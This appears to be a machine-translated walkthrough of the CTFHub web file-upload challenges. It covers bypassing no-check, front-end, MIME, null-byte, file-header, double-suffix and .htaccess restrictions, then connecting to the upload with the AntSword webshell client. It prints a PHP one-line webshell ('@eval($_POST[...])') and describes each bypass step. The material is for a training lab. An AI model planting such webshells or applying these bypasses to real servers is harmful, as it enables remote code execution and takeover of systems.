<>CTFHUB( Skill tree web File upload section
File upload vulnerability means that an attacker uploads an executable file to the server and executes it . The files uploaded here can be Trojans , virus , Malicious script or WebShell etc . This attack is the most direct and effective , The technical threshold of some file upload vulnerabilities is very low , It's easy for attackers to implement .
<> No validation
Because there is no check on the uploaded file here
So we upload it directly php file
First write a sentence
In a word, Trojan horse
$_GET[' '],$_POST[' '],$_COOKIE[' ']
Receive the data we send ,
And pass the received data to the function that executes the command in the one sentence Trojan horse , And then execute the command .
Upload the file to the server with browser ,
We can put it together according to the returned address shell Storage address of
Open the ant sword Connect to destination address
One by one out of the background directory
And then you can find out flag It's over
<> Front end verification
Before the file is uploaded , front end js The code validates the file suffix once
Only when it meets the requirements can it be uploaded , So here we are , Change the file suffix okay
Write a sentence passwd.php Change the suffix to png/jpg So the front end passes
Open the web page to upload the file to the browser
Take out burp, Grab a bag . find passwd.png Change to 1.php
So you can see that the upload is successful , Here we can see our pictures shell Storage location for
copy url Throw it to the ant sword , Fill in the password
stay url Fill us in that column shell Storage address
The password just fills in the variable name in the Trojan horse
Add the filled data in Then let's look at file management
You can see that shell stay /upload lower
And then we can do it in the /html We found it in the directory flag
<>MIME limit
When uploading a file , Limit the upload of malicious files by checking the selected file type
It's the same thing
upload , Grab a bag
take Content-Type Change to image/jpeg
Ant sword connection
Find backstage flag
Here we look at the background source code
stay if Statement, we can see that only the file type is limited
So we can also use and js Bypass the same method
First change the document to jpg Then change the suffix
In this way, the file type also meets the requirements
<>00 truncation
0x00 Is the end identifier of a string , The attacker can add string identifier manually to truncate the following content , And the following content can help us to bypass the detection .
<>00 Restrictions on truncation
PHP<5.3.29, And GPC close
This took me a long time , It's mainly because the display on my side has been passed on
But I can't connect it , I always thought it was the environment
The reason was later found
We can see it on the website /?road= ad locum road Is the path where the file is stored
If you don't truncate the path here , It's just truncated in the file name
The system will automatically store your incoming files in the road lower
Although it was successfully passed on, the file name was modified by itself ,
The file suffix will also be changed to yours Content-Type
So we don't just need to truncate the file name , stay road It's going to have to be cut off so that we can find what you've passed on shell
then 00 Cut off whether it is 0x00 still %00 It's all OK
%00 Is decoded by the server as 0x00
There is another point to note Your shell The name is given by
you road It's named after me
With you file name It has nothing to do with it
<> File header check
Header Check When the browser uploads files to the server ,
The server's response to the uploaded file Content-Type Type ,
If it's allowed on the white list , Then it can be uploaded normally , Otherwise, the upload fails
Let's change the header of the previous sentence
open winhex , Change the file header , What is the specific change ( I'm lazy , I don't want to remember )
winhex Open a real image with the same suffix , Copy the first line
Paste the first line to the front of your sentence
As usual upload Repackaging Ant sword obtain flag
<> Double suffixes
Just brush it again upload Repackaging
Upload succeeded Why ? What about my suffix
Now that you've eaten one of my suffixes Then I'll write two
Hey, hey, hey That's OK And then the ant sword obtain flag
actually This question What about it That is, he will filter out the characters in the blacklist
php It's filtered Since he can filter Then we'll do it
Make it usable after filtering payload
<>.htaccess
.htaccess The file is Apache A configuration file in the server , It is responsible for the configuration of web pages in related directories , adopt .htaccess File can realize web page 301 redirect , custom 404 page , Change file extension , allow / Block access to specific users or directories , Forbidden directory list , Configure default document and other functions .
Let's write one first txt file Then change the name of the file to .htaccess
The content is as follows
What does this mean It's the name contain 2 For your files php analysis
That's it We uploaded it 2.png Can be used as php Yes
Let's upload our .gtaccess Then upload 2.png
Let's visit first 2.png
You can see the code ahead It's the header that was copied before and
<?php @eval($_POST['hack']) ?> No display This proves that php It's parsed
Lianyi sword have to flag
Technology